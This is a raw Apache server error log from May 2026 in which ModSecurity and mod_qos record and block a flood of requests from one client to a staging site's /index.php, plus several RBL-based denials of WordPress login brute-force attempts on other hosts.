[Tue May 26 19:54:16.323996 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDmDRMqfxdEDkoszOqAAAAEQ"]
[Tue May 26 19:54:16.334488 2026] [security2:error] [pid 86490:tid 86655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDlZMwN0DpLVWo6K4egAAAKg"]
[Tue May 26 19:54:16.337327 2026] [security2:error] [pid 93576:tid 93733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDmDRMqfxdEDkoszOpgAAABU"]
[Tue May 26 19:54:16.341675 2026] [security2:error] [pid 86490:tid 86540] [remote 20.153.140.50:39518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.140.153.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5CgAAijE"]
[Tue May 26 19:54:16.353874 2026] [security2:error] [pid 86490:tid 86649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtD1ZMwN0DpLVWo6K4tQAAAKI"]
[Tue May 26 19:54:16.354137 2026] [security2:error] [pid 86490:tid 86630] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDlZMwN0DpLVWo6K4awAAAI8"]
[Tue May 26 19:54:16.356591 2026] [security2:error] [pid 93868:tid 94354] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDkqK9k_ZUB2Vp25HaAAAAe8"]
[Tue May 26 19:54:16.364378 2026] [security2:error] [pid 93576:tid 93801] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtD2DRMqfxdEDkoszOuwAAAFk"]
[Tue May 26 19:54:16.370687 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtD1ZMwN0DpLVWo6K4tgAAAKY"]
[Tue May 26 19:54:16.372898 2026] [security2:error] [pid 93868:tid 94323] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtD0qK9k_ZUB2Vp25HdQAAAdA"]
[Tue May 26 19:54:16.389915 2026] [security2:error] [pid 86490:tid 86658] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K40AAAAKs"]
[Tue May 26 19:54:16.395064 2026] [security2:error] [pid 86490:tid 86651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtD1ZMwN0DpLVWo6K4twAAAKQ"]
[Tue May 26 19:54:16.407423 2026] [security2:error] [pid 86490:tid 86681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtD1ZMwN0DpLVWo6K4sgAAAMI"]
[Tue May 26 19:54:16.409353 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtD0qK9k_ZUB2Vp25HeAAAAcw"]
[Tue May 26 19:54:16.419607 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszOwgAAAGc"]
[Tue May 26 19:54:16.429102 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtD0qK9k_ZUB2Vp25HdAAAAgk"]
[Tue May 26 19:54:16.432239 2026] [security2:error] [pid 93576:tid 93761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszOvgAAADE"]
[Tue May 26 19:54:16.440054 2026] [security2:error] [pid 86490:tid 86740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K41gAAAP0"]
[Tue May 26 19:54:16.440355 2026] [security2:error] [pid 86490:tid 86639] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K43gAAAJg"]
[Tue May 26 19:54:16.445964 2026] [security2:error] [pid 86490:tid 86711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtD1ZMwN0DpLVWo6K4wgAAAOA"]
[Tue May 26 19:54:16.450695 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszOyAAAADw"]
[Tue May 26 19:54:16.452067 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszO3AAAAEc"]
[Tue May 26 19:54:16.453086 2026] [security2:error] [pid 86490:tid 86730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K45gAAAPM"]
[Tue May 26 19:54:16.458639 2026] [security2:error] [pid 86490:tid 86660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtD1ZMwN0DpLVWo6K4uAAAAK0"]
[Tue May 26 19:54:16.579996 2026] [qos:error] [pid 86490:tid 86637] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5VQAAAJY
[Tue May 26 19:54:16.598351 2026] [qos:error] [pid 86490:tid 86696] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtEFZMwN0DpLVWo6K5WQAAANE
[Tue May 26 19:54:16.645385 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5WgAAAK0
[Tue May 26 19:54:16.646901 2026] [qos:error] [pid 86490:tid 86744] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5WwAAAQE
[Tue May 26 19:54:16.660014 2026] [qos:error] [pid 86490:tid 86658] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5XAAAAKs
[Tue May 26 19:54:16.664138 2026] [qos:error] [pid 86490:tid 86743] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5XgAAAQA
[Tue May 26 19:54:16.669243 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5XwAAALQ
[Tue May 26 19:54:16.671402 2026] [qos:error] [pid 86490:tid 86650] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5YAAAAKM
[Tue May 26 19:54:16.688132 2026] [qos:error] [pid 86490:tid 86637] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5YQAAAJY
[Tue May 26 19:54:16.688299 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEGDRMqfxdEDkoszO-gAAAEg
[Tue May 26 19:54:16.759128 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5ZQAAAJ0
[Tue May 26 19:54:16.769302 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5ZgAAAOQ
[Tue May 26 19:54:16.794097 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5ZwAAAK0
[Tue May 26 19:54:16.795073 2026] [qos:error] [pid 86490:tid 86744] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5aAAAAQE
[Tue May 26 19:54:16.810315 2026] [qos:error] [pid 86490:tid 86658] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5aQAAAKs
[Tue May 26 19:54:16.813967 2026] [qos:error] [pid 86490:tid 86743] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5agAAAQA
[Tue May 26 19:54:16.822769 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5awAAANU
[Tue May 26 19:54:16.823949 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5bAAAAL4
[Tue May 26 19:54:16.840799 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5cQAAAJc
[Tue May 26 19:54:16.842298 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEGDRMqfxdEDkoszO_AAAAFc
[Tue May 26 19:54:16.910744 2026] [qos:error] [pid 86490:tid 86728] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5cwAAAPE
[Tue May 26 19:54:16.919481 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5dgAAAKw
[Tue May 26 19:54:16.942208 2026] [qos:error] [pid 86490:tid 86725] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5eAAAAO4
[Tue May 26 19:54:16.944053 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5eQAAAJo
[Tue May 26 19:54:16.960439 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5ewAAAOQ
[Tue May 26 19:54:16.969546 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5fAAAAK0
[Tue May 26 19:54:16.978004 2026] [qos:error] [pid 86490:tid 86744] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5fQAAAQE
[Tue May 26 19:54:16.982774 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5fgAAANU
[Tue May 26 19:54:16.993583 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5gAAAALQ
[Tue May 26 19:54:16.996393 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEGDRMqfxdEDkoszO_QAAAFo
[Tue May 26 19:54:17.029368 2026] [security2:error] [pid 86490:tid 86575] [remote 132.148.78.219:43364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5cgAAiFQ"]
[Tue May 26 19:54:17.075433 2026] [qos:error] [pid 86490:tid 86728] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5ggAAAPE
[Tue May 26 19:54:17.089830 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5hAAAAJo
[Tue May 26 19:54:17.090136 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5hQAAAOQ
[Tue May 26 19:54:17.102511 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5hgAAAK0
[Tue May 26 19:54:17.110525 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5hwAAAP8
[Tue May 26 19:54:17.111884 2026] [security2:error] [pid 86490:tid 86561] [remote 123.30.233.13:35630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5dwAAu0Y"]
[Tue May 26 19:54:17.120288 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5iAAAAL8
[Tue May 26 19:54:17.133248 2026] [qos:error] [pid 86490:tid 86658] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5iQAAAKs
[Tue May 26 19:54:17.136954 2026] [qos:error] [pid 86490:tid 86744] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5igAAAQE
[Tue May 26 19:54:17.145641 2026] [qos:error] [pid 86490:tid 86687] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5iwAAAMg
[Tue May 26 19:54:17.150224 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEWDRMqfxdEDkoszO_wAAAHM
[Tue May 26 19:54:17.225803 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5jQAAAIg
[Tue May 26 19:54:17.284406 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5kwAAAKE
[Tue May 26 19:54:17.285410 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5lAAAAJo
[Tue May 26 19:54:17.287901 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszOywAAADI"]
[Tue May 26 19:54:17.288086 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszOwAAAAEk"]
[Tue May 26 19:54:17.292205 2026] [qos:error] [pid 86490:tid 86674] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEVZMwN0DpLVWo6K5mAAAALs
[Tue May 26 19:54:17.292398 2026] [security2:error] [pid 86490:tid 86717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K42QAAAOY"]
[Tue May 26 19:54:17.301492 2026] [security2:error] [pid 86490:tid 86642] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K47gAAAJs"]
[Tue May 26 19:54:17.311379 2026] [security2:error] [pid 86490:tid 86697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5FwAAANI"]
[Tue May 26 19:54:17.311948 2026] [security2:error] [pid 86490:tid 86652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K45QAAAKU"]
[Tue May 26 19:54:17.312324 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K47AAAAMA"]
[Tue May 26 19:54:17.315014 2026] [security2:error] [pid 86490:tid 86736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K46QAAAPk"]
[Tue May 26 19:54:17.315162 2026] [security2:error] [pid 86490:tid 86745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K46AAAAQI"]
[Tue May 26 19:54:17.327779 2026] [security2:error] [pid 86490:tid 86690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K41AAAAMs"]
[Tue May 26 19:54:17.330986 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszO1AAAAA8"]
[Tue May 26 19:54:17.339030 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszOxwAAAFY"]
[Tue May 26 19:54:17.342554 2026] [security2:error] [pid 86490:tid 86747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K4_AAAAQQ"]
[Tue May 26 19:54:17.365826 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszOzAAAAFg"]
[Tue May 26 19:54:17.368396 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEGDRMqfxdEDkoszO0gAAAEI"]
[Tue May 26 19:54:17.369429 2026] [security2:error] [pid 86490:tid 86647] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K5CQAAAKA"]
[Tue May 26 19:54:17.373952 2026] [security2:error] [pid 86490:tid 86635] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEFZMwN0DpLVWo6K47wAAAJQ"]
